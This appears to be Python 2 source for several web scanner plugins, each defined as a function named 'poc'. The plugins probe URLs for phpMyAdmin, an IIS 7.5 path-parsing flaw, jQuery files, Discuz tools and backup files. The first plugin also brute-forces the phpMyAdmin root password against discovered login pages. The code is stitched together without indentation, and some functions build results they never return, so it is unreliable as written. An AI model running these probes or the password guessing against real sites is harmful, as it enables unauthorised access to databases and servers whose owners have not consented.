def poc(url):
testurl = urlhandler(url)
if not siteIndexTest(testurl):
return # '[SiteRequestErr-phpMyAdmin] %s' % testurl
pmd_path_result = []
for d in PHPMYADMIN_DICT:
payload = testurl + d
try:
r = requests.get(payload, headers=HEADERS, timeout=TIMEOUT,
verify=VERIFY)
if r.status_code == 200 and PHPMYADMIN_KEYWORD in r.content:
#pmd_path_result.append('[phpMyAdmin]-%s' % payload)
pmd_path_result.append(payload)
except Exception:
pass
PWD_OK_RESULT = []
if pmd_path_result:
for pmd_path in pmd_path_result:
for password in PHPMYADMIN_PASSWORD_DICT:
poc_data = {'pma_username': '******', 'pma_password': password}
try:
r = requests.post(pmd_path+'/index.php', data=poc_data, headers=HEADERS,
timeout=TIMEOUT, verify=VERIFY)
if r.status_code == 200 and PHPMYADMIN_LOGIN_OK_KWD in r.content:
PWD_OK_RESULT.append('[phpMyAdmin_PWD] '+pmd_path+'|root|'+password)
except Exception,e:
print e
def poc(url):
testurl = urlhandler(url)
if not siteIndexTest(testurl):
return # '[SiteRequestErr-iisparse] %s' % testurl
payload = testurl + "robots.txt/.php"
try:
r = requests.get(payload,
headers=HEADERS,
timeout=TIMEOUT,
verify=VERIFY)
if IISPARSE_KEYWORD in r.content:
return '[iis7.5_parse] %s' % payload
else:
return False
except Exception:
return False
def poc(url):
testurl = urlhandler(url)
if not siteIndexTest(testurl):
return # '[SiteRequestErr-Jquery] %s' % testurl
result = []
for path in JQUERY_DICT:
try:
payload = testurl + path.strip()
r = requests.get(payload,
headers=HEADERS,
timeout=TIMEOUT,
verify=VERIFY)
if r.status_code == 200 and JQUERY_KEYWORD in r.content:
result.append("[jQuery] " + payload)
except Exception, e:
pass
def poc(url):
testurl = urlhandler(url)
if not siteIndexTest(testurl):
return # '[SiteRequestErr-phpMyAdmin] %s' % testurl
result = []
for d in PHPMYADMIN_DICT:
payload = testurl + d
try:
r = requests.get(payload,
headers=HEADERS,
timeout=TIMEOUT,
verify=VERIFY)
if r.status_code == 200 and PHPMYADMIN_KEYWORD in r.content:
result.append('[phpMyAdmin] %s' % payload)
except Exception:
pass
if result:
return result
def poc(url):
testurl = urlhandler(url)
if not siteIndexTest(testurl):
return # '[SiteRequestErr-Dz_tools] %s' % testurl
result = []
for v in DZ_TOOLS_DICT:
payload = testurl + v
try:
r = requests.get(payload,
headers=HEADERS,
timeout=TIMEOUT,
verify=VERIFY)
if r.status_code == 200 and DZ_TOOLS_KEYWORD in r.content:
result.append('[dz_tools] %s' % payload)
except Exception:
pass
if result:
return result
def poc(url):
testurl = urlhandler(url)
if not siteIndexTest(testurl):
return # '[SiteRequestErr-bakfile] %s' % testurl
return audit(testurl)